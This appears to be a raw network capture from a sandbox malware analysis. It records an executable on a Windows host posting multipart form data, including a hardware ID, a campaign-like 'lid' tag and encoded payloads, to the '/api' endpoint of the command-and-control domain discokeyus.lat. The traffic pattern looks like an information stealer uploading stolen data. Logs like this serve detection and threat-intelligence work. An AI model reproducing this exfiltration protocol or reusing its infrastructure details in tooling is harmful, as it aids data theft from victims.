                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 4f 32 48 45 72 57 6c 6e 31 2b 68 54 53 5a 4e 77 30 74 68 4d 6c 74 48 6e 34 71 61 54 7a 6c 73 4e 77 4b 65 30 45 33 39 54 54 55 4e 6d 5a 55 54 31 54 54 4f 72 6c 4f 39 4a 6b 6c 43 50 78 43 32 47 32 65 4c 37 39 37 76 75 44 79 58 4d 7a 70 45 32 52 33 4d 67 43 67 4e 52 37 50 30 39 52 2b 4f 38 57 32 57 54 53 50 62 6f 59 4c 62 5a 78 39 61 71 69 73 74 2b 4e 65 54 6e 74 45 74 2f 39 77 41 4f 57 32 6e 34 6d 58 6b 57 38 39 31 54 47 4b 39 4d 77 2f 30 70 68 73 6e 2f 31 6f 61 37 2b 6b 63 6c 7a 49 62 39 46 6d 4e 54 43 47 35 50 54 64 79 70 44 56 76 66 6e 48 4d 31 6e 32 69 36 36 41 44 50 78 4f 72 36 69 74 72 4c 4a 6a 55 67 6d 76 56 71 63 6b 66 6f 47 67 73 39 37 49 45 51 65 34 36 59 44 6e 32 7a 59 66 4f 64 53 4a 37 35 39 2f 61 71 76 2b 35 33 41 65 79 69 6f 53 35 6e 58 77 52
                                                                                                                                              Data Ascii: O2HErWln1+hTSZNw0thMltHn4qaTzlsNwKe0E39TTUNmZUT1TTOrlO9JklCPxC2G2eL797vuDyXMzpE2R3MgCgNR7P09R+O8W2WTSPboYLbZx9aqist+NeTntEt/9wAOW2n4mXkW891TGK9Mw/0phsn/1oa7+kclzIb9FmNTCG5PTdypDVvfnHM1n2i66ADPxOr6itrLJjUgmvVqckfoGgs97IEQe46YDn2zYfOdSJ759/aqv+53AeyioS5nXwR
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 62 56 63 51 35 61 67 64 30 79 75 4d 66 4c 77 56 49 72 42 2b 39 36 6d 68 39 5a 58 66 64 43 61 2f 53 35 37 59 78 68 79 42 31 48 30 6e 53 56 66 78 35 42 66 59 62 4e 73 35 2f 31 78 68 74 6d 79 2b 2f 65 37 54 6e 4d 5a 79 65 76 63 4b 67 4a 33 53 55 49 62 56 4d 48 55 49 58 76 62 74 45 4e 4a 6f 32 7a 2b 74 45 79 65 6a 64 50 4f 76 76 50 69 61 79 48 4d 73 6f 45 6d 5a 31 63 41 63 6b 39 42 77 4c 6b 4d 65 73 71 67 64 78 79 75 4d 66 4a 77 46 4e 37 74 7a 38 72 4f 6c 38 35 4c 62 63 7a 48 74 42 4e 2f 43 7a 41 48 42 67 57 59 39 58 31 6e 6a 70 67 4f 66 62 4e 68 38 35 31 49 6e 75 48 4c 35 6f 36 44 67 6c 4d 74 78 4c 71 52 44 6d 39 76 49 45 49 58 64 64 79 68 4c 55 76 66 76 47 64 42 76 33 54 4b 32 48 57 48 2f 4e 50 6d 39 37 71 72 52 37 47 55 69 6f 55 66 66 7a 49 55 4a 77 64 35
                                                                                                                                              Data Ascii: bVcQ5agd0yuMfLwVIrB+96mh9ZXfdCa/S57YxhyB1H0nSVfx5BfYbNs5/1xhtmy+/e7TnMZyevcKgJ3SUIbVMHUIXvbtENJo2z+tEyejdPOvvPiayHMsoEmZ1cAck9BwLkMesqgdxyuMfJwFN7tz8rOl85LbczHtBN/CzAHBgWY9X1njpgOfbNh851InuHL5o6DglMtxLqRDm9vIEIXddyhLUvfvGdBv3TK2HWH/NPm97qrR7GUioUffzIUJwd5
                                                                                                                                              2024-12-20 15:39:36 UTC261INData Raw: 72 79 77 57 76 39 67 77 6a 6d 34 42 47 4f 45 64 2f 43 72 71 65 54 52 30 6b 46 76 37 55 57 46 6b 35 4d 70 6d 4a 6c 33 49 51 67 47 76 50 30 64 33 32 7a 4f 4b 72 67 65 4d 4c 70 35 38 6f 65 68 39 59 66 4f 63 53 4b 38 51 39 50 59 78 6c 44 50 6d 58 63 31 43 41 61 38 78 78 33 4a 61 50 73 2f 72 68 74 68 2f 7a 54 35 73 2b 36 71 30 66 4d 2b 4d 36 35 61 6e 4e 7a 61 4c 73 47 42 61 52 4d 49 56 65 72 76 43 74 78 39 33 7a 47 7a 41 78 2f 78 4c 4b 72 33 2f 4b 44 44 6e 32 46 68 73 6e 58 52 6b 38 70 51 32 65 42 70 62 56 34 65 70 4c 70 55 6e 33 6d 55 5a 50 39 56 49 71 4e 6d 2b 4b 61 34 38 64 62 7a 51 41 61 37 51 4a 6a 44 7a 41 65 4f 6d 54 35 74 52 78 36 6b 30 56 72 57 62 4d 38 74 71 52 38 78 74 6a 54 42 36 2b 37 71 30 5a 55 2b 46 4b 35 45 6b 64 54 64 41 63 7a 2b 5a 69 64 50
                                                                                                                                              Data Ascii: rywWv9gwjm4BGOEd/CrqeTR0kFv7UWFk5MpmJl3IQgGvP0d32zOKrgeMLp58oeh9YfOcSK8Q9PYxlDPmXc1CAa8xx3JaPs/rhth/zT5s+6q0fM+M65anNzaLsGBaRMIVervCtx93zGzAx/xLKr3/KDDn2FhsnXRk8pQ2eBpbV4epLpUn3mUZP9VIqNm+Ka48dbzQAa7QJjDzAeOmT5tRx6k0VrWbM8tqR8xtjTB6+7q0ZU+FK5EkdTdAcz+ZidP
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 32 63 37 30 0d 0a 46 5a 38 6c 6c 44 72 2f 53 6e 4c 2f 4e 50 71 30 37 71 72 42 6e 79 56 30 2f 68 33 50 67 64 52 65 6d 4a 6c 6d 62 52 41 4d 73 71 67 49 6e 7a 4f 55 65 37 77 41 4d 37 64 33 36 4b 62 70 7a 4b 2f 71 5a 43 79 72 58 59 37 74 39 52 65 62 31 48 59 36 57 52 4c 70 36 78 54 52 62 4d 4a 38 38 56 49 75 38 53 7a 48 35 65 61 79 72 6f 4d 2b 4f 65 30 53 33 2b 62 49 48 6f 2f 65 5a 6a 77 46 65 65 62 6c 48 4d 68 36 6c 48 4c 2f 46 47 48 70 4a 4c 44 6c 71 75 50 52 6c 53 35 7a 39 68 2f 4d 68 4a 74 43 6e 70 64 70 62 56 34 65 70 4c 70 55 6e 33 6d 55 5a 50 39 56 49 71 4e 6d 2b 4b 61 34 38 64 62 7a 51 41 2b 71 54 4a 72 55 32 31 4b 76 30 6d 51 71 43 42 43 38 35 31 71 48 55 70 52 30 2f 79 31 76 38 57 79 2b 2f 65 37 48 6b 73 4e 77 4a 72 74 62 30 76 33 4d 46 6f 54 65 59
                                                                                                                                              Data Ascii: 2c70FZ8llDr/SnL/NPq07qrBnyV0/h3PgdRemJlmbRAMsqgInzOUe7wAM7d36KbpzK/qZCyrXY7t9Reb1HY6WRLp6xTRbMJ88VIu8SzH5eayroM+Oe0S3+bIHo/eZjwFeeblHMh6lHL/FGHpJLDlquPRlS5z9h/MhJtCnpdpbV4epLpUn3mUZP9VIqNm+Ka48dbzQA+qTJrU21Kv0mQqCBC851qHUpR0/y1v8Wy+/e7HksNwJrtb0v3MFoTeY
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 38 73 45 69 52 4b 38 5a 38 35 31 4a 6d 73 6d 62 73 6f 36 33 6b 6b 6f 70 41 48 34 70 45 6d 4e 4c 64 41 4a 62 57 50 77 4e 2b 66 38 4c 57 44 39 78 6c 32 6a 75 70 41 32 48 2f 4e 50 48 6c 39 73 76 52 68 54 34 65 34 77 71 48 6b 35 4e 51 74 4e 70 2b 49 30 39 49 37 61 55 39 30 57 7a 56 4b 71 38 46 4c 76 35 61 79 49 54 75 76 4e 48 4c 50 6e 6e 2f 42 4e 2f 58 32 6c 44 5a 69 53 4a 32 48 51 32 72 75 45 6a 41 4a 63 31 38 71 56 4a 35 34 7a 71 2b 74 2b 36 71 30 59 70 39 4d 37 39 4d 6e 4d 58 49 56 37 2f 6e 56 79 4e 50 58 2b 72 34 46 39 4e 4b 31 79 32 31 4c 42 2b 6b 64 2f 43 72 71 65 53 41 6a 54 42 68 6f 67 72 48 36 6f 74 59 77 65 59 2b 62 56 41 65 70 4b 67 76 33 47 58 61 4f 36 6b 44 62 4a 5a 36 2b 61 53 34 34 70 7a 42 58 79 4b 38 51 4e 2b 64 69 78 62 42 67 53 4a 6a 43 46
                                                                                                                                              Data Ascii: 8sEiRK8Z851Jmsmbso63kkopAH4pEmNLdAJbWPwN+f8LWD9xl2jupA2H/NPHl9svRhT4e4wqHk5NQtNp+I09I7aU90WzVKq8FLv5ayITuvNHLPnn/BN/X2lDZiSJ2HQ2ruEjAJc18qVJ54zq+t+6q0Yp9M79MnMXIV7/nVyNPX+r4F9NK1y21LB+kd/CrqeSAjTBhogrH6otYweY+bVAepKgv3GXaO6kDbJZ6+aS44pzBXyK8QN+dixbBgSJjCF


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.4 | 49737       | 104.21.21.99   | 443              | 7308 | C:\Users\user\Desktop\gJkNLYV0ax.exe
Timestamp               | Bytes transferred | Direction | Data
2024-12-20 15:39:38 UTC | 273               | OUT       | POST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=LI06XNEYW6Q
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 18121
                                                                                                                                              Host: discokeyus.lat
                                                                                                                                              2024-12-20 15:39:38 UTC15331OUTData Raw: 2d 2d 4c 49 30 36 58 4e 45 59 57 36 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 42 37 37 39 36 44 35 30 31 31 36 38 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 49 30 36 58 4e 45 59 57 36 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 49 30 36 58 4e 45 59 57 36 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4c 49 30 36 58 4e 45 59 57 36 51 0d 0a 43 6f 6e 74
                                                                                                                                              Data Ascii: --LI06XNEYW6QContent-Disposition: form-data; name="hwid"79B7796D501168FCAC8923850305D13E--LI06XNEYW6QContent-Disposition: form-data; name="pid"2--LI06XNEYW6QContent-Disposition: form-data; name="lid"PsFKDg--pablo--LI06XNEYW6QCont
                                                                                                                                              2024-12-20 15:39:38 UTC2790OUTData Raw: 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52
                                                                                                                                              Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
2024-12-20 15:39:39 UTC | 1141 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:39 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=45lb0vbsmu2iier32v66471ull; expires=Tue, 15 Apr 2025 09:26:18 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CF%2F5tkimjBhc70w6nUYaGb%2BNWXwT%2Bb%2BySZHnXatWI3%2BpwIV2mMHu0ug%2FDltGuX7RX7r8uokerkKQl7GHMG8fzPZ%2B69V4%2FXehqLl%2BaXHjfaiVheqRuDDzBldnZqX75FSPpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50b9ef2a1378e7-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1816&rtt_var=701&sent=13&recv=20&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19074&delivery_rate=1538461&cwnd=234&unsent_bytes=0&cid=00c2176f7829ffeb&ts=982&x=0"
2024-12-20 15:39:39 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 15:39:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.4 | 49739       | 104.21.21.99   | 443              | 7308 | C:\Users\user\Desktop\gJkNLYV0ax.exe
Timestamp               | Bytes transferred | Direction | Data
2024-12-20 15:39:40 UTC | 270               | OUT       | POST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=V1TMRKCAP
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 8730
                                                                                                                                              Host: discokeyus.lat
                                                                                                                                              2024-12-20 15:39:40 UTC8730OUTData Raw: 2d 2d 56 31 54 4d 52 4b 43 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 42 37 37 39 36 44 35 30 31 31 36 38 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 31 54 4d 52 4b 43 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 31 54 4d 52 4b 43 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 31 54 4d 52 4b 43 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                              Data Ascii: --V1TMRKCAPContent-Disposition: form-data; name="hwid"79B7796D501168FCAC8923850305D13E--V1TMRKCAPContent-Disposition: form-data; name="pid"2--V1TMRKCAPContent-Disposition: form-data; name="lid"PsFKDg--pablo--V1TMRKCAPContent-Disp
2024-12-20 15:39:41 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:41 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=63751th3akgkeajpuut1mo5llm; expires=Tue, 15 Apr 2025 09:26:20 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OUmQ2KEqTVON1A6L7nanFf3xFz4AGZhTWF%2FWAL2iAF1ReN9gYPlI%2BuoLDCTmvfiy6%2B%2Fzrg9RI41wBq3qP7z3ZahPTNWKpQ5ZbCoZ6xU5po1n%2BSvZ2%2FdFVhQIvCFotOvSFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50b9fd6ce14285-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1594&rtt_var=605&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2831&recv_bytes=9658&delivery_rate=1798029&cwnd=32&unsent_bytes=0&cid=d5af13200aa83d54&ts=830&x=0"
                                                                                                                                              2024-12-20 15:39:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                              2024-12-20 15:39:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49741        104.21.21.99    443               7308  C:\Users\user\Desktop\gJkNLYV0ax.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-20 15:39:43 UTC  273                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=LVE2G100NVG
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20395
Host: discokeyus.lat
2024-12-20 15:39:43 UTC  15331              OUT        Data Raw: 2d 2d 4c 56 45 32 47 31 30 30 4e 56 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 42 37 37 39 36 44 35 30 31 31 36 38 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 56 45 32 47 31 30 30 4e 56 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 56 45 32 47 31 30 30 4e 56 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4c 56 45 32 47 31 30 30 4e 56 47 0d 0a 43 6f 6e 74
Data Ascii: --LVE2G100NVGContent-Disposition: form-data; name="hwid"79B7796D501168FCAC8923850305D13E--LVE2G100NVGContent-Disposition: form-data; name="pid"3--LVE2G100NVGContent-Disposition: form-data; name="lid"PsFKDg--pablo--LVE2G100NVGCont
                                                                                                                                              2024-12-20 15:39:43 UTC5064OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb
                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO@
2024-12-20 15:39:44 UTC  1134               IN         HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 15:39:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=opdcjoqa4vp2ap40b5usuukoe6; expires=Tue, 15 Apr 2025 09:26:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2aphFwAH%2F%2FSG4657L482V7IvLnIgCxqtYSz3rKHRlj3RrvAA32yOjAjEJvB%2B4ISbCOQ7CIuYcxoXvOZGbDRwWPaZDtQ%2Fi4e%2BSGQGUaJL2NBXjjVYxDh1OV0Hrl5Ck9RwA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50ba0cc9b078d3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1929&min_rtt=1877&rtt_var=741&sent=19&recv=27&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21348&delivery_rate=1555673&cwnd=210&unsent_bytes=0&cid=be279c150c542fed&ts=1394&x=0"
2024-12-20 15:39:44 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 15:39:44 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49742        104.21.21.99    443               7308  C:\Users\user\Desktop\gJkNLYV0ax.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-20 15:39:46 UTC  271                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=X3K3GI65MX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1209
Host: discokeyus.lat
2024-12-20 15:39:46 UTC  1209               OUT        Data Raw: 2d 2d 58 33 4b 33 47 49 36 35 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 42 37 37 39 36 44 35 30 31 31 36 38 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 33 4b 33 47 49 36 35 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 33 4b 33 47 49 36 35 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 58 33 4b 33 47 49 36 35 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d
Data Ascii: --X3K3GI65MXContent-Disposition: form-data; name="hwid"79B7796D501168FCAC8923850305D13E--X3K3GI65MXContent-Disposition: form-data; name="pid"1--X3K3GI65MXContent-Disposition: form-data; name="lid"PsFKDg--pablo--X3K3GI65MXContent-
2024-12-20 15:39:47 UTC  1127               IN         HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 15:39:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=sr2aqjga5hh2ldgs7npdoanl52; expires=Tue, 15 Apr 2025 09:26:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNN7SQVtysooEGtshV8vmx3XJ%2BQzqC69AwmcGiMY2NUfykwuyQ89tRLIyFpXuSYDpZ0TC9V6IX53oqRglOk%2BhrHnieiTR3h9IrNvvBS22Ga1stO510O6fQekK916be%2F6qQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50ba216eedc402-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1650&rtt_var=642&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2116&delivery_rate=1674311&cwnd=166&unsent_bytes=0&cid=acec5a9f80d04aca&ts=1077&x=0"
2024-12-20 15:39:47 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 15:39:47 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.4  49743        104.21.21.99    443               7308  C:\Users\user\Desktop\gJkNLYV0ax.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-20 15:39:49 UTC  273                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KI1BBKSJ3B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 570728
Host: discokeyus.lat
